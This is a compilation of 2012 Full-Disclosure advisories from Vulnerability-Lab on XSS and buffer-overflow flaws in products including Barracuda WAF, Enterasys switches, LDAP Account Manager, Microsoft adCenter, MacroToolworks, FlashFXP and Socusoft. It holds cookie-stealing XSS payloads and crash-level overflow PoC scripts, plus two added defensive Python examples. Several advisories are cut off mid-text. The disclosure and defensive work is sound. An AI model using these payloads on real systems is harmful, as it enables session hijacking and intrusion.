[Full-disclosure] Barracuda WAF 660 v7.6.0.028 - Cross Site Vulnerability
Title:
======
Barracuda WAF 660 v7.6.0.028 - Cross Site Vulnerability

Date:
=====
2012-03-07

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=444

VL-ID:
=====
444

Introduction:
=============
The Barracuda Web Application Firewall provides superior protection against hackers' attempts to exploit vulnerabilities in Web sites or Web applications to steal data, cause denial of service or deface Web sites. By integrating application delivery capabilities, the Barracuda Web Application Firewall is an affordable and comprehensive application firewall that can secure Web applications, as well as increase their performance and availability.

- Protection against common attacks
- Outbound data theft protection
- Web site cloaking
- Granular policies
- Secure HTTP traffic
- SSL Offloading
- SSL Acceleration
- Load Balancing

The Barracuda Web Application Firewall is a complete and powerful security solution for Web applications and Web sites. It provides award-winning protection against hackers leveraging protocol or application vulnerabilities to instigate data theft, denial of service or defacement of your Web site.

(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php )

Abstract:
=========
The Vulnerability-Lab Team discovered a non-persistent cross site scripting vulnerability in Barracuda's Web Application Firewall 660 v7.6.0.028.

Report-Timeline:
================
2012-02-16: Vendor Notification
2012-02-19: Vendor Response/Feedback
2012-03-05: Vendor Fix/Patch
2012-03-07: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Barracuda Networks
Product: Barracuda Web Application Firewall 660 v7.6.0.028

Exploitation-Technique:
=======================
Remote

Severity:
=========
Low

Details:
========
A client-side cross site scripting vulnerability has been detected in Barracuda's Web Application Firewall 660 v7.6.0.028. The vulnerability allows a remote attacker to hijack customer/moderator/admin sessions with medium required user interaction. Successful exploitation can result in account theft or client-side context manipulation when processing firewall module application requests.

Vulnerable Module(s):
[+] sessions_by_userfilter=[x]

Picture(s):
../1.png
../2.png

Risk:
=====
The security risk of the non-persistent (client-side) cross site scripting vulnerability is estimated as low(+).

Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012 | Vulnerability-Lab

--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Enterasys SecureStack Switch v6.x - Multiple Vulnerabilities
Title:
======
Enterasys SecureStack Switch v6.x - Multiple Vulnerabilities

Date:
=====
2012-03-08

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=443

VL-ID:
=====
443

Introduction:
=============
The Enterasys C5 is a scalable, high-performance Gigabit Ethernet switch offering support for IEEE 802.3at compliant high-power PoE, flexible 10 Gigabit Ethernet options, dynamic IPv4 and IPv6 routing and enhanced automation capabilities to provide for a future-proofed solution that significantly reduces operational expenses for customers. Along with a switch capacity of 264 Gbps, the C5 provides up to 48 10/100/1000 Ethernet ports as well as two SFP+ ports, with the ability to support both 1GE and 10GE uplinks on the same port. Leveraging the C5's stacking capability, as many as 8 C5s (both 24-port and 48-port combinations) can be interconnected in a single stack to create a virtual switch that provides 2.11 Tbps of capacity and up to 384 10/100/1000 Ethernet ports as well as 16 10GE uplink ports.

All C-Series products include a comprehensive lifetime warranty that includes services for which many competitors charge additional fees. Included benefits, such as advanced hardware return, firmware feature upgrades (which most vendors cover at most for 90 days) and telephone support (which most don't include or severely limit) combine to significantly decrease operational costs for organizations, equaling savings of up to $1 million in service contract fees over the life of a customer's network.

(Copy of the Vendor Homepage: http://www.enterasys.com/products/security-enabled-infrastructure/securestack-cseries.aspx )

Abstract:
=========
A Vulnerability Laboratory Researcher discovered multiple web vulnerabilities in Enterasys SecureStack Switch v6.x.
Report-Timeline:
================
2012-02-16: Vendor Notification
2012-**-**: Vendor Response/Feedback
2012-**-**: Vendor Fix/Patch
2012-03-08: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Enterasys
Product: SecureStack Switch v6.x

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple persistent input validation vulnerabilities have been detected in Enterasys SecureStack switches, series A to C. Local low-privileged user accounts can inject malicious script code to manipulate modules via persistent context requests. When exploited by an authenticated user, the identified vulnerabilities can result in information disclosure via error messages, session hijacking, access to available appliance services, and persistent execution of manipulated content out of the application context.

Vulnerable Module(s):
[+] System Name
[+] System Location
[+] System Contact
[+] VLAN Name

Affected Model(s):
[+] B2G124-24  - Firmware: 04.02.08.0006
[+] B2G124-48  - Firmware: 04.02.08.0006
[+] B3G124-48  - Firmware: 04.02.08.0006
[+] B5G124-24  - Firmware: 06.41.02.0007
[+] B5G124-48  - Firmware: 06.41.05.0001, 06.41.06.0002, 06.42.08.0007
[+] C3G124-24P - Firmware: 06.03.08.0012, 06.42.10.0016 (latest)
[+] C3G124-48  - Firmware: 06.03.04.0004
[+] C3G124-48P - Firmware: 06.03.08.0012

Picture(s):
../1.png
../2.png
../3.png
../4.png
../5.png
../6.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with low required user interaction. For demonstration or reproduction ...

Exploitation via Console:

Command#1: set vlan name 1337 <script>alert(document.cookie)</script>
Command#2: set system name <iframe src=http://www.vulnerability-lab.com>
Command#3: set system location <iframe src=a onload=alert(VL)>
Command#4: set system contact <script>alert('VL')</script>

Note: To exploit the bug via the web interface, see the pictures section.

Risk:
=====
The security risk of the persistent input validation vulnerabilities is estimated as high(-).
Credits:
========
Vulnerability Laboratory Researcher - Julien Ahrens (MrTuxracer) [www.inshell.net]
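The four fields named in the advisory (System Name, System Location, System Contact, VLAN Name) are written from the CLI and rendered by the switch's web interface without escaping, so the quickest fleet-wide check is to pull the stored strings and flag any that contain markup. The following is an added example, not code from the advisory or from Enterasys: it scans a constructed configuration dump written in the same "set ..." command form the proof of concept uses (that a real switch's saved configuration or "show config" output matches this form is an assumption) and reports the values an attacker has seeded. The same three system strings are also exposed as sysName, sysLocation and sysContact in SNMPv2-MIB, so an snmpwalk dump can be fed through the same check once the line patterns are adapted.

```python
import re

# The four CLI commands from the advisory's proof of concept. The strings they
# store are rendered by the switch web interface, so they are the values to audit.
# Assumed dump syntax: the same "set ..." form the advisory's commands use.
AUDITED_COMMANDS = [
    ("system name",     re.compile(r"^set\s+system\s+name\s+(.*)$")),
    ("system location", re.compile(r"^set\s+system\s+location\s+(.*)$")),
    ("system contact",  re.compile(r"^set\s+system\s+contact\s+(.*)$")),
    ("vlan name",       re.compile(r"^set\s+vlan\s+name\s+(\d+)\s+(.*)$")),
]

# Anything that turns a description string into markup once it is echoed into
# HTML unescaped: a tag opener, an inline event handler, a javascript:/data: URL.
MARKUP = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:|data:", re.IGNORECASE)


def audit_config(config_text):
    """Return (field, value) pairs for stored strings that contain markup.

    `config_text` is a saved configuration (or a "show config" style dump)
    as one string; one command per line.
    """
    findings = []
    for raw in config_text.splitlines():
        line = raw.strip()
        for field, pattern in AUDITED_COMMANDS:
            m = pattern.match(line)
            if not m:
                continue
            groups = m.groups()
            value = groups[-1].strip().strip('"')     # value may be quoted
            label = field if len(groups) == 1 else "%s (vlan %s)" % (field, groups[0])
            if MARKUP.search(value):
                findings.append((label, value))
            break
    return findings


# Constructed sample: a dump carrying the advisory's four payloads plus two
# benign values, to show what is and is not flagged.
SAMPLE_CONFIG = """\
set system name "<iframe src=http://www.vulnerability-lab.com>"
set system location "<iframe src=a onload=alert(VL)>"
set system contact "<script>alert('VL')</script>"
set vlan name 1 DEFAULT
set vlan name 1337 "<script>alert(document.cookie)</script>"
set vlan name 20 "Servers, 2nd floor (don't rename)"
"""

if __name__ == "__main__":
    for label, value in audit_config(SAMPLE_CONFIG):
        print("markup in %-22s %r" % (label + ":", value))
```

The check is intentionally conservative: a legitimate name such as "Servers <prod>" would be flagged too, which is preferable on a device where the string goes straight into an admin's browser.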
[Full-disclosure] Pitrinec MacroToolworks 7.5 - Buffer Overflow Vulnerability
Title:
======
Pitrinec MacroToolworks 7.5 - Buffer Overflow Vulnerability

Date:
=====
2012-03-08

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=466

VL-ID:
=====
466

Introduction:
=============
Macro Toolworks is powerful all-in-one Windows automation macro software. It allows the user to record macros, visually edit macros and play back macros in any Windows application. Each macro can be triggered in multiple ways depending on the user's needs: by keyboard shortcuts, mouse clicks or other events, macro scheduler, hotkey, toolbars, etc. Macros recorded in the macro recorder (both keyboard recorder and mouse recorder) can be manually edited and optimized. Macros can simply mimic the user by sending Windows keys and mouse clicks, or they can do even more complex repetitive daily tasks such as file backups and other file manipulation, filling web forms, e-mail writing, chatting, inserting data into database forms, file downloading/uploading, file and directory zipping and encryption and more ...

(Copy of the Vendor Homepage: http://www.pitrinec.com/toolsworks_de.htm )

Abstract:
=========
A Vulnerability Laboratory Researcher discovered a local buffer overflow vulnerability in Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0.

Report-Timeline:
================
2012-03-08: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Pitrinec Software
Product: Macro Toolworks Framework Free, Pro, Standard v7.5.0

Exploitation-Technique:
=======================
Local

Severity:
=========
High

Details:
========
A buffer overflow vulnerability has been detected in Pitrinec Software's Macro Toolworks Free/Standard/Pro v7.5.0 Edition (current version). The vulnerability is located in the main executable _prog.exe, which gets invoked e.g. by _loader.exe or by StartMacroToolworks.exe. When launching _prog.exe, or an executable which invokes _prog.exe, it automatically reads the contents of options.ini from the application directory. It reads the [last] section string to determine which files were last opened by the user.
The application does not validate the string length of the [last] section before passing the content to a buffer, which could lead to a local buffer overflow.

--- Debugger ---

# 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242 (exc.code c0000005, tid 3128)

# Registers:
# EAX 0120EA00  Stack[000004C8]:0120EA00
# EBX 00000000
# ECX 42424242
# EDX 00000002
# ESI 007F6348  _prog.exe:007F6348
# EDI 007F6348  _prog.exe:007F6348
# EBP 0120EA0C  Stack[000004C8]:0120EA0C
# ESP 0120E9E8  Stack[000004C8]:0120E9E8
# EIP 00646D36  _prog.exe:00646D36
# EFL 00200206

# Stack:
# 0120E9E0  0012DF3C
# 0120E9E4  00000000
# 0120E9E8  0205A5A0  debug045:0205A5A0
# 0120E9EC  1B879EF8
# 0120E9F0  007F6348  _prog.exe:007F6348
# 0120E9F4  007F6348  _prog.exe:007F6348

# Crash:
# _prog.exe:00646D36 ; ---
# _prog.exe:00646D36 mov     eax, [ecx]
# _prog.exe:00646D38 call    dword ptr [eax+0Ch]
# _prog.exe:00646D3B call    near ptr unk_6750D0
# _prog.exe:00646D40 retn    4
# _prog.exe:00646D40 ; ---

# Dump:
# 007F6380  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
# 007F6390  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
# 007F63A0  42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43
# 007F63B0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43
# 007F63C0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43

Note: Affected are all other products provided by Pitrinec Software which use _prog.exe too.

Picture(s):
../1.png

Proof of Concept:
=================
The buffer overflow vulnerability can be exploited by local attackers without user interaction. For demonstration or reproduction ...

#!/usr/bin/python
# Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow
# Version: 7.5.0
# Date: 2012-03-04
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.macrotoolworks.com
# Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German
# Notes: Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications in the same way.
# Howto: Copy options.ini to App-Dir -- Launch

# 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242 (exc.code c0000005, tid 3128)
# Registers:
# EAX 0120EA00  Stack[000004C8]:0120EA00
# EBX 00000000
# ECX 42424242
# EDX 00000002
# ESI 007F6348  _prog.exe:007F6348
# EDI 007F6348  _prog.exe:007F6348
# EBP 0120EA0C
[Full-disclosure] HITB2011KUL - Satellite Telephony Security - Jim Geovedi
Title:
======
HITB2011KUL - Satellite Telephony Security - Jim Geovedi

Date:
=====
2012-03-07

References:
===========
Download: http://www.vulnerability-lab.com/resources/videos/464.wmv
View: http://www.youtube.com/watch?v=23FKGifzCJs

VL-ID:
=====
464

Status:
=======
Published

Exploitation-Technique:
=======================
Conference

Severity:
=========
High

Details:
========
This talk will provide an in-depth treatment of satellite telephony networks from a security perspective. The overall system seems secure, but in reality it cannot be expected to be fully reliable. We will briefly cover the satellite mobile system architecture, then discuss GMR (GEO-Mobile Radio) system elements, e.g. GSS (Gateway Station Subsystem), MES (Mobile Earth Station), AOC (Advanced Operation Center) and TCS (Traffic Control Subsystem) for GMR-1 systems, and NCC (Network Control Center), GW (Gateway), SCF (Satellite Control Facility) and CMIS (Customer Management Information System) for GMR-2 systems. From there, we will discuss the security issues of the GMR system, as it shares similar vulnerabilities with GSM: GMR is derived from the terrestrial digital cellular standard GSM and supports access to GSM core networks. This comes along with some interesting demos. Time permitting, a question and answer session at the end of the presentation will allow participants to cover any additional issues in satellite telephony systems they'd like to discuss.

Credits:
========
Jim Geovedi - (Independent Security Researcher)

Note: BBC News described Jim as a guy who "doesn't look like a Bond villain... but possesses secrets that some of them might kill for".
[Full-disclosure] FlashFXP v4.1.8.1701 - Buffer Overflow Vulnerability
Title:
======
FlashFXP v4.1.8.1701 - Buffer Overflow Vulnerability

Date:
=====
2012-03-01

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=462

VL-ID:
=====
462

Introduction:
=============
FlashFXP is an FTP (File Transfer Protocol) client for Windows. It offers you easy and fast ways to transfer any file between other local computers (LAN - Local Area Network) running an FTP server or via the Internet (WAN - Wide Area Network), and even directly between two servers using Site to Site transfers (FXP - File eXchange Protocol). Use FlashFXP to publish and maintain your website, upload and download documents, photos, videos, music and more! Share your files with your friends and co-workers using the powerful site manager. There are many features and advanced options available within FlashFXP which are being added with the release of each new version, stable or beta*. The software is available in over 20 languages and under active development. FlashFXP offers high security, performance, and reliability that you can always depend on to get your job done swiftly and efficiently.

(Copy of the Vendor Homepage: http://www.flashfxp.com)

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a buffer overflow vulnerability in FlashFXP v4.1.8.1701.

Report-Timeline:
================
2012-02-27: Vendor Notification
2012-02-28: Vendor Response/Feedback
2012-03-01: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
OpenSight Software
Product: FlashFXP Software Client v4.1.8.1701

Exploitation-Technique:
=======================
Local

Severity:
=========
High

Details:
========
A buffer overflow vulnerability has been detected in the FlashFXP software client v4.1.8.1701. The vulnerability is triggered when forcing a ListIndex Out of Bound(s) exception, which allows overwriting ecx and eip of the affected software process. Successful exploitation can result in process compromise, execution of arbitrary code, system compromise or escalation with the privileges of the affected vulnerable software process.

The flaw is a direct result of a fixed-length buffer being used in the TListBox control and the lack of range checking. The code assumes that the string returned by the listbox control will be less than 4097 characters. It uses a fixed-size buffer of 4096 bytes and any text longer than this will overflow and overwrite the memory beyond it. The TComboBox control also suffers from a similar flaw.

Vulnerable Module(s):
[+] List Index Exception Handling [TListBox]

Picture(s):
../1.png
../2.png
../3.png
../4.png
../5.png

Proof of Concept:
=================
The vulnerability can be exploited by local and remote attackers. For demonstration or reproduction ...

Manually reproduce ...

1. Download and open the software client
2. Connect to a random server for interaction
3. Enable the option Settings => Filters => Skip-List
4. Open the Option => Filter Settings
5. Add a new Skip-List entry by including a large unicode string and wait for the exception handling
6. The out-of-bounds exception handling comes up
7. Pass it 2 times by clicking continue ...
8. The software now crashes with a stable BEX exception and displays the input as offset[6]
9. Now you can overwrite ecx and eip of the affected vulnerable software process to exploit the client system

Note: To exploit the bug remotely, an attacker needs to know the included filters of the connected client in order to send large strings.

--- Exception Error #1 ---

date/time         : 2012-02-28, 16:38:58, 531ms
computer name     : HOSTBUSTER
user name         : Rem0ve
operating system  : Windows 7 Tablet PC x64 Service Pack 1 build 7601
system language   : German
system up time    : 5 days 13 hours
program up time   : 7 minutes 2 seconds
processors        : 2x Intel(R) Core(TM)2 Duo CPU T6600 @ 2.20GHz
physical memory   : 2243/4091 MB (free/total)
free disk space   : (C:) 207,54 GB
display mode      : 1366x768, 32 bit
process id        : $16fc
allocated memory  : 50,75 MB
executable        : FlashFXP.exe
exec. date/time   : 2012-01-15 22:45
executable hash   : 34A53BD60479975EA6DAAB55B8D878B4
version           : 4.1.8.1701
ANSI code page    : 1252
callstack crc     : $1083d124, $c40af1d7, $90cfaf70
exception number  : 1
exception class   : EStringListError
exception message : List index out of bounds (0).

--- Exception Error #2 ---

date/time         : 2012-02-28, 16:39:57, 530ms
computer name     : HOSTBUSTER
user name         : Rem0ve
operating system  : Windows 7 Tablet PC x64 Service Pack 1 build 7601
system language   : German
system up time    : 5 days 13 hours
program up
[Full-disclosure] LDAP Account Manager Pro v3.6 (lamp) - Multiple Vulnerabilities
Title:
======
LDAP Account Manager Pro v3.6 - Multiple Vulnerabilities

Date:
=====
2012-03-01

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=458

VL-ID:
=====
458

Introduction:
=============
LDAP Account Manager Pro is an extended version of LAM which focuses on enterprise usage. It helps you to lower your administration costs by providing enhanced tools for your users and deskside support staff.

Features
LDAP Account Manager (LAM) is a web frontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. LAM was designed to make LDAP management as easy as possible for the user. It abstracts from the technical details of LDAP and allows persons without technical background to manage LDAP entries. If needed, power users may still directly edit LDAP entries via the integrated LDAP browser.

(Copy of the Vendor Homepage: http://www.ldap-account-manager.org/lamcms/lamPro )

Abstract:
=========
The Vulnerability-Lab Team discovered multiple web vulnerabilities in LDAP Account Manager Pro v3.6.

Report-Timeline:
================
2012-02-22: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Open Source
Product: LDAP Account Manager Pro (lamp) v3.6

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
1.1
Multiple persistent input validation vulnerabilities have been detected in LDAP Account Manager Pro v3.6. The bug allows a remote attacker to inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability allows an attacker to manipulate modules/context (persistent) and can lead to session hijacking (user/mod/admin).

Vulnerable Module(s):
[+] User Listing List Input/Output
[+] Export

Picture(s):
../1.png
../2.png

1.2
Multiple client-side cross site scripting vulnerabilities have been detected in LDAP Account Manager Pro v3.6. The bug allows a remote attacker to hijack customer/admin sessions with medium required user interaction. Successful exploitation leads to session hijacking or client-side module manipulation attacks, and the result is account theft.

Vulnerable Module(s):
[+] attr=
[+] Filter - Search Listing

Picture(s):
../3.png
../4.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with low to high required user interaction. For demonstration or reproduction ...

1.1
Code Review: Exception handling of User Input Listing

<div class="statusError ui-corner-all">
<table>
<tbody>
<tr>
<td><img src="list.php-filter-Dateien/error.png" alt="ERROR" height="32" width="32"></td>
<td><h2 class="statusError ui-corner-all">Please enter a valid filter. Only letters, numbers and _*$.@- are allowed.</h2>
<p class="statusError ui-corner-all">-1'[INJECTED PERSISTENT SCRIPT CODE!]</p></td>
</tr>
</tbody>
</table>
...

or

Code Review: Export Function - Persistent Error Output File

# Suchbereich: base
# Suchfilter: <iframe src=http://google.com>
# Anzahl Einträge: 0
# Generated by LDAP Account Manager (http://phpldapadmin.sourceforge.net) on February 22, 2012 4:51 pm
# Version: 3.6
version: 1

(The German header lines of the export read: search scope, search filter, number of entries.)

Reference(s):
../export-import-p0c.ldif
../list.php-filter.htm

1.2
http://www.ldap-account-manager.org/lam/templates/3rdParty/pla/htdocs/cmd.php?cmd=add_value_form&server_id=1&dn=uid%3Dpc01%24%2Cou%3Dmachines%2Cdc%3Dlam-demo%2Cdc%3Dorg&attr=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=1200%20height=800%3E

Reference(s):
../cmd.php-attr.htm
../attr=.txt

Risk:
=====
The security risk of the persistent web vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri
[Full-disclosure] Microsoft AdCenter Service - Cross Site Vulnerabilities
Title:
======
Microsoft AdCenter Service - Cross Site Vulnerabilities

Date:
=====
2012-02-27

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=447
MSRC ID: 12223

VL-ID:
=====
447

Introduction:
=============
Microsoft adCenter (formerly MSN adCenter) is the division of the Microsoft Network (MSN) responsible for MSN's advertising services. Microsoft adCenter provides pay per click advertisements. This is a service aimed at people who want to advertise a product. Microsoft also has a (still in beta) service for webmasters who want to monetize on their site: Microsoft pubCenter. Search and display advertising solutions for small businesses and large advertisers and agencies on Bing and Yahoo! Search, MSN, Windows Live, Xbox & Co.

(Copy of the Vendor Website: http://advertising.microsoft.com/home)

Abstract:
=========
The Vulnerability-Lab Team discovered multiple non-persistent cross site scripting vulnerabilities in Microsoft's AdCenter website application.

Report-Timeline:
================
2012-02-18: Vendor Notification
2012-02-19: Vendor Response/Feedback
2012-02-26: Vendor Fix/Patch
2012-02-27: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Low

Details:
========
A non-persistent cross site scripting vulnerability has been detected in Microsoft's AdCenter website application. The vulnerability allows a remote attacker, with required user interaction, to hijack customer sessions via cross site scripting. Successful exploitation can result in account theft, client-side phishing or session hijacking.

Vulnerable Module(s):
[+] austra123; media brands; tv

Picture(s):
../1.png
../2.png
../3.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with high required user interaction. For demonstration or reproduction ...

advertising.microsoft.com/austra123%27;alert%28document.cookie%29;a=%27
advertising.microsoft.com/media-brands';alert(document.cookie);a='
advertising.microsoft.com/tv';alert(document.cookie);a='

Reference(s):
advertising.microsoft.com/austra123
advertising.microsoft.com/media-brands
advertising.microsoft.com/tv

Risk:
=====
The security risk of the non-persistent cross site scripting vulnerabilities is estimated as low(+).

Credits:
========
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x)
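Barracuda's sessions_by_userfilter parameter, LAM's filter error box and LDIF export header, and the adCenter path segments above are one bug class, but the adCenter payload ';alert(document.cookie);a=' is worth a second look: the reflected value lands inside a JavaScript string literal, where HTML entity encoding does nothing because the browser's HTML parser never sees the quotes as markup. The following is an added example, not code from any of the advisories or vendors. It renders one request value into an assumed two-sink page skeleton (an error-message text node, as in LAM, and an inline script string literal, as in adCenter), first the vulnerable way by concatenation and then with the encoding each context needs. The parameter name is borrowed from the Barracuda advisory; the page skeleton, function names and the script_count helper are assumptions made for the example.

```python
import html
import json
import urllib.parse

# Payloads quoted in the advisories: an HTML-context payload (Enterasys/LAM
# style) and the adCenter JavaScript-string-context payload.
HTML_PAYLOAD = "<script>alert(document.cookie)</script>"
JS_PAYLOAD = "';alert(document.cookie);a='"


def render_unsafe(value):
    """Vulnerable pattern: the request value is concatenated into both sinks
    as-is, once into a text node and once into an inline script literal."""
    return ('<p class="statusError">%s</p>\n'
            "<script>var page = '%s';</script>" % (value, value))


def js_string_literal(value):
    """Encode for a JavaScript string literal inside a <script> element.

    json.dumps yields a double-quoted literal with quotes, backslashes, control
    characters and (ensure_ascii) U+2028/2029 escaped. The HTML parser still
    runs first and would end the script element at a '</script>' inside the
    literal, so '<', '>' and '&' are additionally written as \\u escapes, which
    the JavaScript engine decodes back to the original characters.
    """
    s = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        s = s.replace(ch, esc)
    return s


def render_safe(value):
    """Hardened form: each sink gets the encoding for its own context."""
    return ('<p class="statusError">%s</p>\n'
            "<script>var page = %s;</script>"
            % (html.escape(value, quote=True), js_string_literal(value)))


def error_page(query_string, safe=True):
    """Echo the request's filter parameter back into the page, the way the
    Barracuda sessions_by_userfilter and LAM filter sinks do."""
    params = urllib.parse.parse_qs(query_string, keep_blank_values=True)
    value = params.get("sessions_by_userfilter", [""])[0]
    return render_safe(value) if safe else render_unsafe(value)


def roundtrip_ok(value):
    """The encoded literal must still decode to the original string."""
    return json.loads(js_string_literal(value)) == value


def script_count(page):
    """Number of <script> start tags the HTML parser sees: 1 for the template's
    own script, more when a payload has broken out of its context. A crude
    indicator, good enough to show the difference between the two renderers."""
    return page.lower().count("<script")


if __name__ == "__main__":
    for payload in (HTML_PAYLOAD, JS_PAYLOAD):
        qs = "sessions_by_userfilter=" + urllib.parse.quote(payload, safe="")
        print("unsafe:", error_page(qs, safe=False))
        print("safe:  ", error_page(qs))
```

With the adCenter payload the safe rendering is var page = "';alert(document.cookie);a='"; the single quotes are inert inside a double-quoted JSON literal, and the text-node copy is entity-encoded separately. The point to carry away is that the encoder is chosen by the sink, not by the source of the data.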
[Full-disclosure] Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability
Title:
======
Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability

Date:
=====
2012-02-27

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=460

VL-ID:
=====
460

Introduction:
=============
Socusoft Photo to Video Converter Professional allows you to create all kinds of eye-catching slideshow videos (mp4, flv, mov, avi, mkv, mpeg, h.264, h.264 HD, 3gp, 3gpp2, swf) playable on YouTube, Facebook, MySpace, iPod, iPad, iPhone, Archos, PSP, Zune. With the powerful Photo to Video Converter Professional, you could convert photos to animated and dynamic video and share the video on YouTube, Facebook, MySpace, iPod, iPad, iPhone. With just a few minutes of work, you'll have an eye-catching slideshow video with background music and dynamic pan/zoom and attractive transition effects. This powerful Photo to Video Converter Professional supports over 260 animating transition effects with Pan/Zoom effect.

(Copy of the Vendor Homepage: )

Abstract:
=========
A Vulnerability Laboratory Researcher discovered a local buffer overflow vulnerability in Socusoft's Photo to Video Converter Free and Professional v8.05.

Report-Timeline:
================
2012-02-27: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Socusoft
Product: Photo 2 Video v8.05

Exploitation-Technique:
=======================
Local

Severity:
=========
High

Details:
========
A buffer overflow vulnerability has been detected in Socusoft Photo to Video Converter Free and Professional v8.05 (current version). The vulnerability is located in pdmlog.dll. Successful exploitation can result in execution of code, overwrite of registers and system compromise.
Vulnerable DLL(s):
[+] pdmlog.dll

--- Registers ---
# EAX 42424242
# EBX 00360000  pdmlog.dll:00360000
# ECX 0036BF3B  pdmlog.dll:pdmlog_5+A66B
# EDX 80284006
# ESI 00000002
# EDI 00000000
# EBP 01C5FC0C  Stack[000001AC]:01C5FC0C
# ESP 01C5FBF0  Stack[000001AC]:01C5FBF0
# EIP 42424242
# EFL 00010206

--- Stack ---
# 01C5FBE0  00000000
# 01C5FBE4  00000002
# 01C5FBE8  000094B7
# 01C5FBEC  00000001
# 01C5FBF0  0036BF6F  pdmlog.dll:pdmlog_5+A69F  <- Crash
# 01C5FBF4  00360000  pdmlog.dll:00360000
# 01C5FBF8  00000002
# 01C5FBFC  00000000
# 01C5FC00  00000000
# 01C5FC04  01C5FC20  Stack[000001AC]:01C5FC20
# 01C5FC08  7FFDE000  debug066:7FFDE000

--- Dump ---
# 00370584  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
# 00370594  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
# 003705A4  42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43
# 003705B4  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43
# 003705C4  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43

Picture(s):
../1.png

Proof of Concept:
=================
The vulnerability can be exploited by local attackers. For demonstration or reproduction ...

#!/usr/bin/python
# Exploit Title: Socusoft Photo to Video Converter Free/Pro v8.05 (pdmlog.dll) Local Buffer Overflow PoC
# Version: 8.05
# Date: 2012-02-26
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.socusoft.com
# Tested on: Windows XP SP3 Professional German
# Notes: Overflow occurs in pdmlog.dll
# Howto: Import Reg - Start App

# --- Registers ---
# EAX 42424242
# EBX 00360000  pdmlog.dll:00360000
# ECX 0036BF3B  pdmlog.dll:pdmlog_5+A66B
# EDX 80284006
# ESI 00000002
# EDI 00000000
# EBP 01C5FC0C  Stack[000001AC]:01C5FC0C
# ESP 01C5FBF0  Stack[000001AC]:01C5FBF0
# EIP 42424242
# EFL 00010206
# --- Stack ---
# 01C5FBE0  00000000
# 01C5FBE4  00000002
# 01C5FBE8  000094B7
# 01C5FBEC  00000001
# 01C5FBF0  0036BF6F  pdmlog.dll:pdmlog_5+A69F  <- Crash
# 01C5FBF4  00360000  pdmlog.dll:00360000
# 01C5FBF8  00000002
# 01C5FBFC  00000000
# 01C5FC00  00000000
# 01C5FC04  01C5FC20  Stack[000001AC]:01C5FC20
# 01C5FC08  7FFDE000  debug066:7FFDE000

file = "poc.reg"

# 548 bytes of filler reach the saved return address, the four 0x42 bytes
# land in EIP (see the register dump above), and the tail pads the string.
junk1 = "\x41" * 548
boom = "\x42\x42\x42\x42"
junk2 = "\x43" * 100

